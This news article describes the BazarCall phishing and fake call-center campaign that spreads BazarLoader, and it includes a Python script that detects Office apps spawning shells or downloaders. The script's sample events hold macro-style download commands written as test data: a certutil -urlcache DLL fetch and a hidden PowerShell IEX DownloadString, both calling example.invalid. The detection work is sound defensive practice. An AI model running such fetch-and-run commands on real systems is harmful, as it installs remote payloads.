As ransomware attacks have become more sophisticated, Microsoft cybersecurity researchers are now tracking BazarCall, a cybercriminal operation that runs call centers to spread the BazarLoader malware, according to ZDNet.
BazarCall, also known as BazaCall, is a cybercriminal gang that has been active since January this year. Its approach differs from that of other cybercrime groups in that it uses live call center operators to trick victims. The attack typically starts with a phishing email telling the recipient that a trial subscription is about to expire and that a monthly fee will be charged automatically unless they call a phone number to cancel it.
Brad Duncan from Palo Alto Networks explained the gang’s attack method in a blog post: “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network”.
The example below is an email from a fake tech company claiming that the victim has downloaded a demo version that will expire within 24 hours, after which the software will be charged for.
We’re tracking an active BazaCall malware campaign leading to human-operated attacks and ransomware deployment. BazaCall campaigns use emails that lure recipients to call a number to cancel their supposed subscription to a certain service. pic.twitter.com/RS5wGSndhv
— Microsoft Security Intelligence (@MsftSecIntel) June 22, 2021
What does the phishing email look like?
Microsoft's security team explains the steps of the scam: "When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file in order to cancel the service. The Excel file contains a malicious macro that downloads the payload".
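The step described above, a macro in the downloaded Excel file fetching the payload, leaves a well-known trace on the endpoint: Excel spawning a command interpreter or a download utility. The following is an added detection example written for this article; it is not code from Microsoft, Palo Alto Networks or the original page. It assumes Sysmon-style process-creation events with the real Sysmon field names Image, ParentImage and CommandLine; the sample events, process names and the example.invalid URLs are constructed for illustration, not captured from a BazarCall infection.

```python
import re
from typing import Dict, List, Optional

# Office applications that should almost never spawn a shell or a downloader.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Children that a macro typically uses to stage or download a payload.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe",
}

# Command-line fragments that indicate a download from the network.
DOWNLOAD_HINTS = re.compile(
    r"(https?://|DownloadString|DownloadFile|Invoke-WebRequest|urlcache|"
    r"\bIWR\b|Net\.WebClient)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding if an Office app spawned a suspicious child, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS:
        return None  # only Office-parented processes are in scope

    reasons: List[str] = []
    if child in SUSPICIOUS_CHILDREN:
        reasons.append(f"office app spawned {child}")
    if DOWNLOAD_HINTS.search(event.get("CommandLine", "")):
        reasons.append("command line contains download indicator")
    if not reasons:
        return None  # e.g. Excel launching a print helper is normal

    return {
        "host": event.get("Computer", "?"),
        "parent": parent,
        "child": child,
        "command_line": event.get("CommandLine", ""),
        "reasons": reasons,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the classifier over a batch of process-creation events."""
    findings = []
    for event in events:
        finding = classify_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (assumption: Sysmon Event ID 1 field names).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # macro uses certutil to fetch a DLL: should be flagged on two counts
        "Computer": "WS01", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c certutil -urlcache -split -f http://example.invalid/a.dll C:\Users\Public\a.dll',
    },
    {   # macro launches a hidden PowerShell downloader: should be flagged
        "Computer": "WS01", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\"",
    },
    {   # user opens Excel from Explorer: benign
        "Computer": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r'"EXCEL.EXE" C:\Users\alice\Documents\budget.xlsx',
    },
    {   # Excel spawns the print spooler helper: benign
        "Computer": "WS02", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
    {   # PowerShell with a download, but not from an Office parent: out of scope here
        "Computer": "SRV01", "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -c Invoke-WebRequest http://example.invalid/update",
    },
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["host"], finding["child"], "-", "; ".join(finding["reasons"]))
```

The rule is deliberately narrow: it fires only when an Office process is the parent, so the last sample (a service-launched PowerShell download) is left to other detections rather than being lumped in here. In production the same logic would read Sysmon or EDR telemetry instead of the constructed list.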
BazarCall also uses Cobalt Strike, a commercial penetration-testing framework widely abused by attackers, to steal credentials, including the Active Directory (AD) database. Cobalt Strike is commonly used to move deeper into a network after the initial compromise, so a single infected machine can lead to other computers on the same network being compromised as well.
The bottom line is that you should be wary of unsolicited emails or phone calls asking you to open links, download applications or provide personal information. In the overwhelming majority of cases, they are not legitimate.